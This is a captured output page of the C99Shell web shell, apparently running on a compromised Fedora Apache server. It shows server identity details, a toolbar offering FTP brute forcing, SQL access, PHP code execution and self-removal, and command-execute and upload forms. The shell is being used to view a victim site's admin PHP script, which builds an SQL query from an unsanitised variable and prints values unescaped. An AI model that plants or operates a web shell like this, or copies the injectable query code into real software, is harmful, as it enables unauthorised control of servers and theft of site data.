!C99Shell v. 1.0 pre-release build #16!

Software: Apache/2.0.54 (Fedora). PHP/5.0.4 

uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 

uid=48(apache) gid=48(apache) groups=48(apache)
context=system_u:system_r:httpd_sys_script_t
 

Safe-mode: OFF (not secure)

/home/mnnews/public_html/mina/minabusineseng/admin/   drwxr-xr-x
Free 3.9 GB of 27.03 GB (14.42%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     listSpooledNews.inc.php3 (4.62 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?


  


  
if(checkSuperSession($superSession, $REMOTE_ADDR))


    {      


      require(
"$mysqlCall");


     


      include(
"include/rootGui.inc.php3");


      


      
$userId = getUserSUId($superSession);


      
$userInfo = getUserInfo($userId);


      


      if((
$userInfo[SuperUser] == 1) && ($userInfo[manageNewsSpool] == 1) && ($userInfo[active]==1))


    {


      
$query = sqlQuery($seg, $spooledNews);


      
$mysql_result = mysql_query($query, $mysql_link);


      


      
$rows=countRows($spooledNews);


      


      if(
$rows>0)


        {


          
navGen($seg, $spooledNews, "index.php3?mode=listSpooledNews&superSession=$superSession");


          


        }


      


      


      while((
$row = mysql_fetch_row($mysql_result)))


        {


          
$item_ID =    $row[0];


          
$item_title =     $row[1];


          
$item_details = $row[2];


          
$item_date =     $row[3];


          
$userId =        $row[4];


          
$item_topic =        $row[5];

            
$item_slag =        $row[6];





          
$userInfo = getUserInfo($userId);








          if(
$item_topic != 0)


        {


          


          require(
"$mysqlCall");


          


          
$query = "SELECT * FROM $topics  where Id=\"$item_topic\"";


          


          
$mysql_result2 = mysql_query($query, $mysql_link);


          


          if(
$row = mysql_fetch_row($mysql_result2))


            {


              
$imageId =  $row[3];


            }


          else


            {


              print(
"Something wrong: get image data<br>");


            }


        }


          


          


          


          print(
"<table width=100% border=0 cellpadding=3 cellspacing=0 >");


          print(
"<tr><td bgcolor=$border_colour align=center>");


          


          print(
"<table width=100% border=0 cellpadding=5 cellspacing=0 >");


          


          
printf("<tr>\n");


          


          print(
"<td bgcolor=$table_colour2 width=100% colspan=2>\n");


          print(
"<b>$item_date</b>\n");


          print(
"Submited by <a href=\"mailto:$userInfo[email]\" class=\"navigation\">$userInfo[user]</a>\n");


          print(
"</td>");


          print(
"<td rowspan=2 bgcolor=$table_colour >");


          


          print(
"<form method=\"post\" action=\"index.php3?mode=addingSpooledNews&superSession=$superSession&spooledNewsId=$item_ID\">");


          print(
"<input type=hidden name=details value=\"$item_details\"><input type=submit value=Add></form>");


          


          print(
"<form method=\"post\" action=\"index.php3?mode=editSpooledNews&superSession=$superSession&spooledNewsId=$item_ID\">");


          print(
"<input type=submit value=Edit></form>");


          


          


          print(
"<form method=\"post\" action=\"index.php3?mode=delSpooledNews&superSession=$superSession&spooledNewsId=$item_ID\">");


          print(
"<input type=submit value=Del></form>");


          


          


          print(
"</td>");


          


          
printf("</tr>\n");


          
printf("<tr>\n");


          


          print(
"<td bgcolor=$bgcolour>\n");

            print(
"$item_slag\n");
          print(
"<h1><u>$item_title</u></h1>\n");
            
            
$prazno=nl2br($item_details);

            print(
"<br><br>");

          print(
"$prazno\n");


          print(
"</td>\n");


          


          print(
"<td align=right bgcolor=$bgcolour >\n");


          








          if(
$item_topic != 0)


        {


          


          print(
"<td bgcolor=$bgcolour align=right>\n");


          

          print(
"</td>\n");


          


        }





          else


        {


          print(
"<td bgcolor=$bgcolour align=right>\n");


          print(
"No topic selected");


          print(
"</td>\n");





        }























          print(
"</td>\n");


          


          print(
"</tr>\n");


          print(
"</table>");


          print(
"<tr><td>");


          print(
"</table>");


          print(
"<br><br>");


    


        }


  


      if(
$rows>0)


        {


          
navGen($seg, $spooledNews, "index.php3?mode=listSpooledNews&superSession=$superSession");


          


        }


      


      if(!isset(
$item_title))


        {


          print(
"No items to print");


        }  


    }


      else


    {


      print(
"You do not have access to this function");


    }


      


      include(
"include/guiBase.inc.php3");


      print(
"</table>");


      


    }


    


    





  else


    {


      
//session is bad


      
print("Bad Session ID ($session)!<BR>\n");


      
$superSession = "";


    }


?>


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0036 ]--